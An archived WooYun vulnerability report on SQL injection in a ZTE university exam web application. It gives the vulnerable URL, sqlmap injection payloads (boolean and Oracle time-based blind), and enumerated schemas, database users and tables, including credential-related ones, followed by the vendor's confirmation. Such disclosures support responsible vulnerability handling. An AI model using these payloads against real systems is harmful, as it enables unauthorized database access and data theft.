乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-01: 细节已通知厂商并且等待厂商处理中 2014-03-03: 厂商已经确认,细节仅向厂商公开 2014-03-13: 细节向核心白帽子及相关领域专家公开 2014-03-23: 细节向普通白帽子公开 2014-04-02: 细节向实习白帽子公开 2014-04-15: 细节向公众公开
URL:http://univ1.zte.com.cn/XsExam/Application/ForePlatform/Exam_ErrorQestion_Analyse.aspx?examNo=55239&studentNO=20070910056177基于布尔值的盲注[*] starting at 17:58:26[17:58:26] [INFO] resuming back-end DBMS 'oracle'[17:58:26] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: examNo Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: examNo=55239' AND 3796=3796 AND 'IqXn'='IqXn&studentNO=20070910056177 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: examNo=55239' AND 5439=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(75)||CHR(97)||CHR(79),5) AND 'SRkp'='SRkp&studentNO=20070910056177Place: GETParameter: studentNO Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: examNo=55239&studentNO=20070910056177' AND 4317=4317 AND 'fBuR'='fBuR Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: examNo=55239&studentNO=20070910056177' AND 1817=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(99)||CHR(104)||CHR(76),5) AND 'alET'='alET---there were multiple injection points, please select the one to use for following injections:[0] place: GET, parameter: studentNO, type: Single quoted string (default)[1] place: GET, parameter: examNo, type: Single quoted string[q] Quit>[17:58:36] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Oracle[17:58:36] [INFO] fetching current database[17:58:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[17:58:36] [INFO] retrieved:[17:58:37] [WARNING] reflective value(s) found and filtering outXSEXAMcurrent schema (equivalent to database on Oracle): 'XSEXAM'[17:59:08] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[17:59:08] [INFO] fetching database (schema) names[17:59:08] [INFO] fetching number of databases[17:59:08] [INFO] resumed: 30[17:59:08] [INFO] resumed: ADAPTEXAM[17:59:08] [INFO] resumed: AMP[17:59:08] [INFO] resumed: CTXSYS[17:59:08] [INFO] resumed: DBSNMP[17:59:08] [INFO] resumed: DMSYS[17:59:08] [INFO] resumed: DSC[17:59:08] [INFO] resumed: DSCMD[17:59:08] [INFO] resumed: EASK[17:59:08] [INFO] resumed: ELEARNING[17:59:08] [INFO] resumed: EMPTRAIN[17:59:08] [INFO] resumed: EMPTRAIN2004[17:59:08] [INFO] resumed: ETS[17:59:08] [INFO] resumed: ETS_INTERFACE[17:59:08] [INFO] resumed: EUNIV[17:59:08] [INFO] resumed: EVALCENTER[17:59:08] [INFO] resumed: EXFSYS[17:59:08] [INFO] resumed: LHC[17:59:08] [INFO] resumed: MAIL_SERVICE[17:59:08] [INFO] resumed: MDSYS[17:59:08] [INFO] resumed: OLAPSYS[17:59:08] [INFO] resumed: ORDSYS[17:59:08] [INFO] resumed: OUTLN[17:59:08] [INFO] resumed: SYS[17:59:08] [INFO] resumed: SYSMAN[17:59:08] [INFO] resumed: SYSTEM[17:59:08] [INFO] resumed: TSMSYS[17:59:08] [INFO] resumed: WMSYS[17:59:08] [INFO] resumed: XDB[17:59:08] [INFO] resumed: XSEXAM[17:59:08] [INFO] resumed: ZTETRAINavailable databases [30]:[*] ADAPTEXAM[*] AMP[*] CTXSYS[*] DBSNMP[*] DMSYS[*] DSC[*] DSCMD[*] EASK[*] ELEARNING[*] EMPTRAIN[*] EMPTRAIN2004[*] ETS[*] ETS_INTERFACE[*] EUNIV[*] EVALCENTER[*] EXFSYS[*] LHC[*] MAIL_SERVICE[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] XSEXAM[*] ZTETRAIN
Users:database management system users [49]:[*] ADAPTEXAM[*] AMP[*] ANONYMOUS[*] BACKUPUSER[*] CTXSYS[*] DBSNMP[*] DIP[*] DMSYS[*] DSC[*] DSCMD[*] EASK[*] ELEARNING[*] EMPTRAIN[*] EMPTRAIN2004[*] ETS[*] ETS_INTERFACE[*] EUNIV[*] EVALCENTER[*] EXFSYS[*] HR_SLT[*] LHC[*] MAIL_SERVICE[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] NC_READER[*] OLAPSYS[*] ORACLE_OCM[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSMAN[*] SYSTEM[*] TIVOLI[*] TO_DSS[*] TO_ESEARCH[*] TO_ETS[*] TO_FOL[*] TO_HR[*] TPG[*] TSMSYS[*] UNIVARCHIVE[*] UNIVDB_DMOLVIEW[*] WMSYS[*] XDB[*] XSEXAM[*] ZTETRAINTables:Database: DMSYS[2 tables]+-------------------+| DM$P_MODEL || DM$P_MODEL_TABLES |+-------------------+比较慢我就跑到这里把。。[18:08:06] [INFO] fetching tables for database: 'XSEXAM'[18:08:06] [INFO] fetching number of tables for database 'XSEXAM'[18:08:06] [WARNING] running in a single-thread mode. Please consider usage option '--threads' for faster data retrieval[18:08:06] [INFO] retrieved:[18:08:08] [WARNING] reflective value(s) found and filtering out142[18:08:28] [INFO] retrieved: TMP_ANSWER_LOG_TMP[18:12:30] [INFO] retrieved: ATMP_ID[18:14:10] [INFO] retrieved: ATMP_ID_UPDID[18:15:54] [INFO] retrieved: BACKUP_1[18:17:42] [INFO] retrieved: CHECK_EMPLOYEEBASE_INFO[18:22:34] [INFO] retrieved: EXAM_ANSWER_57721[18:26:21] [INFO] retrieved: EXAM_ANSWER_TEMP_UPDID[18:29:05] [INFO] retrieved: EXAM_AUTOJUDGE_QUEUE[18:32:20] [INFO] retrieved: EXAM_BASE_DEFINE[18:34:57] [INFO] retrieved: EXAM_COPY_SUCCEED[18:37:48] [INFO] retrieved: EXAM_COPY_SUCCEED_UPDID[18:39:52] [INFO] retrieved: EXAM_DIC_DIFFICULT[18:42:51] [INFO] retrieved: EXAM_EXAMINATION_EX[18:46:10] [INFO] retrieved: EXAM_FILE_QUEUE[18:48:33] [INFO] retrieved: EXAM_FILE_QUEUE_HISTORY[18:50:57] [INFO] retrieved: EXAM_GROUP_INFO[18:53:27] [INFO] retrieved: EXAM_GROUP_INFO_UPDID[18:55:31] [INFO] retrieved: EXAM_GROUP_USER[18:56:56] [INFO] retrieved: EXAM_GROUP_USER_UPDID[18:58:55] [INFO] retrieved: EXAM_JUDGING_CONFIG[19:02:11] [INFO] retrieved: EXAM_JUDGING_CONFIG_UPDID[19:04:20] [INFO] retrieved: EXAM_LEVEL_TEMPLATE_UPDID[19:08:58] [INFO] retrieved: EXAM_MEMBERLIST[19:11:21] [INFO] retrieved: EXAM_OBJECT_EXAM[19:13:58] [INFO] retrieved: EXAM_OBJECT_EXAM_TEST[19:15:53] [INFO] retrieved: TMP_ANSWER_LOG_71913[19:20:18] [INFO] retrieved: EXAM_TQ_EES_BL_UPDID[19:24:42] [INFO] retrieved: EXAM_TQ_EES_CA[19:25:43] [INFO] retrieved: EXAM_TQ_EES_CA_UPDID[19:27:39] [INFO] retrieved: EXAM_TQ_EES_GR[19:28:42] [INFO] retrieved: EXAM_TQ_EES_GR_SELITEMS[19:31:15] [INFO] retrieved: EXAM_TQ_EES_GR_UPDID[19:33:01] [INFO] retrieved: EXAM_TQ_EES_JU[19:34:04] [INFO] retrieved: EXAM_TQ_EES_JU_UPDID[19:36:09] [INFO] retrieved: EXAM_TQ_EES_LI[19:37:12] [INFO] retrieved: EXAM_TQ_EES_LI_SELITEMS[19:39:46] [INFO] retrieved: EXAM_TQ_EES_LI_UPDID[19:41:32] [INFO] retrieved: EXAM_TQ_EES_MS[19:42:35] [INFO] retrieved: TMP_ANSWER_20090617_2[19:47:22] [INFO] retrieved: TMP_ANSWER_20090617_2_UPDID[19:49:36] [INFO] retrieved: TMP_ANSWER_20090617_UPDID[18:41:29] [INFO] fetching tables for database: 'SYSMAN'[18:41:29] [INFO] fetching number of tables for database 'SYSMAN'[18:41:29] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[18:41:29] [INFO] retrieved:[18:41:30] [WARNING] reflective value(s) found and filtering out341[18:41:52] [INFO] retrieved: MGMT_CREDENTIAL_SETS[18:46:23] [INFO] retrieved: MGMT_CREDENTIAL_SET_COLUMNS[18:49:05] [INFO] retrieved: MGMT_CREDENTIALS2[18:50:18] [INFO] retrieved: MGMT_NOTIFY_QTABLE[18:53:28] [INFO] retrieved: AQ$_MGMT_NOTIFY_QTABLE_S[18:58:57] [INFO] retrieved: SYS_IOT_OVER_50179[19:03:07] [INFO] retrieved: MGMT_VERSIONS[19:06:12] [INFO] retrieved: MGMT_TABLE_SIZES[19:08:56] [INFO] retrieved: MGMT_INDEX_SIZES[19:11:42] [INFO] retrieved: MGMT_REBUILD_INDEXES[19:15:21] [INFO] retrieved: MGMT_LICENSES[19:17:25] [INFO] retrieved: MGMT_AVAILABILITY[19:20:17] [INFO] retrieved: MGMT_CURRENT_AVAILABILITY[19:24:59] [INFO] retrieved: MGMT_AVAILABILITY_MARKER[19:29:21] [INFO] retrieved: MGMT_MASTER_AGENT[19:32:18] [INFO] retrieved: MGMT_MASTER_CHANGED_CALLBACK[19:36:22] [INFO] retrieved: MGMT_TARGET_BASELINES[19:40:09] [INFO] retrieved: MGMT_TARGET_BASELINES_DATA[19:42:11] [INFO] retrieved: MGMT_METRICS[19:44:03] [INFO] retrieved: MGMT_METRICS_EXT[19:45:40] [INFO] retrieved: MGMT_TARGET_TYPES[19:48:41] [INFO] retrieved: MGMT_TARGETS[19:49:31] [INFO] retrieved: MGMT_TYPE_PROPER
危害等级:高
漏洞Rank:10
确认时间:2014-03-03 09:18
感谢U神,相关漏洞会尽快修复,谢谢
暂无